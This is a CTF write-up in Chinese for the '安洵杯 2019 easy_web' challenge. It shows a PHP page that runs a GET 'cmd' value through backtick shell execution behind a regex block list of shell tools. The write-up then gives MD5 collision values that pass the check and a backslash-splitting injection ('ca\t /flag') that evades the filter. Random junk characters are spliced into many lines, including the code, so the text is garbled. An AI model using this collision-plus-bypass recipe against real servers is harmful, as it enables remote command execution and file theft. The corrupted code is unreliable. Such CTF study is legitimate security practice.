[安洵杯 2019]easy_web

admin

: t% A- M* D# n1 C: c! Q<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
) w& c  f: Q2 Q4 H9 P% J<p>&nbsp;</p>
+ ?# H+ j' ^# m- e. `! t: ]$ G<p>&nbsp;</p>
5 l1 y) u* H8 X" ^9 b<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>&nbsp;</p>
% ]) @4 o: e1 [1 a7 a1 S" _! d<p>&nbsp;</p>
, ^- a) r6 G& m3 \" N/ Q7 `<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
4 D% k6 i0 Z( v0 L3 ]4 ]8 o<p>首先把那个进行一次base64位解码</p>
, M" a) L. x3 V  X- \" a) |0 ^<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
3 H) _2 p2 R7 G% g( R/ C! q) }% U+ j<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
/ _4 k1 v5 E+ G' v# L<p>&nbsp;然后用hex解码一下得到了</p>
4 u3 S' c( Z- I- U1 d" s+ }<div class="cnblogs_Highlighter">
: m3 \" a% t) J1 L: h0 ]4 }<pre class="brush:sql;gutter:true;">555.png
</pre>
2 b& b, }$ ^4 m9 j6 ?</div>
<p>　　用同样的方法把index.php进行加密</p>
* F+ k0 L8 m  @+ k- d5 A<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
* t5 _; v3 b6 I9 [) u) S</div>
  r5 i/ O0 ?, [% s7 D<p>　　然后输入到地址栏</p>
<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
. o4 [3 L2 E/ n</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
0 A2 X, Z  J7 {</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
3 w" S& Q1 S* m# ~9 `9 [5 ~9 p    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
" c3 g; H& F6 k6 l4 m</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
( I1 s0 J! z! L( D
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
& X3 U0 I3 V7 O$ s7 R' o( B, B5 s} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
- x* [  P5 c  _4 {</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
- l: `- B& \4 b</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
1 q9 T. b9 k$ o6 z' P; D0 ]8 @</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
: p6 n8 t# z' w' k, J    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
/ L! x: x, _' X5 i; k3 u! p    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
0 W( w' N2 [6 o& k' ~, H    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
4 D: O: {$ |. |. [  d8 ?        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
! ?$ a5 u- ^! [* M( U        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
" x) m  |4 u: L* u6 ]    }
}
# u3 N0 M6 K5 Z' p, u
$ W  t1 y3 y( A- B& X</span>?&gt;
2 W1 A- v) m$ x# U0 W&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
  body{
3 Q% h: W* ]0 H# M: k   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
# }% V7 R, l5 |2 w  Y   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
( ~8 Z) h0 _. b3 E, z&lt;body&gt;
) a7 `, K5 G3 t4 c' Z: o+ U! O&lt;/body&gt;
/ g/ {3 A; [# K  t&lt;/html&gt;</pre>
3 b3 B9 s5 [5 t1 A3 B</div>
( B: e; H5 Y# H, F" W/ c<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
+ p. n5 m+ M6 \* l: U    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
$ J" x! a0 H$ ~1 U6 L        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
4 u( c- @/ J" M9 ]" o4 j5 j: t2 A    }</span></pre>
</div>
<p>这种MD5是md5强碰撞</p>
2 @' z* ?7 }. L. E<div class="cnblogs_Highlighter">
- @# h  }8 z8 Q. Z% t: @$ e<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
8 s* H0 j9 i, z& D9 {5 m( r/ X</pre>
8 r, m; T5 ~* `6 e' ^% I</div>
9 z* A- x; U* k<div class="cnblogs_Highlighter">
4 L0 }0 s6 d6 Z! u  [  g<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
<p>于是采用payload:</p>
5 b$ o; q; l9 X0 a- Q<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
' V: R4 K7 j3 l, E: w5 v! Z<p>&nbsp;</p>
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
' p4 ^1 Y5 a0 `; `' X<p>ls和l\s在命令执行的时候结果是一样的。</p>
<p>然后发现根目录里面有/flag</p>
# L+ a' p5 P1 X9 Y. R$ p; t$ }0 x: H) _<p>于是payload:</p>
9 k  `/ Y/ G% K! z9 l' L<div class="cnblogs_Highlighter">
( ~4 _, Q8 [) t+ j+ y$ U1 v& A& I% {<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
" ^* R# U; n+ O( y6 F  s/ l3 T</pre>
7 e  K: w( p6 `* E& Q</div>
5 q6 x0 _7 s: `7 d5 s, v3 H1 Z<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
' [( _9 z4 v% e5 p) P<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
1 ?* P7 E4 B6 L% u  P+ k; e2 a) K<p>&nbsp;</p>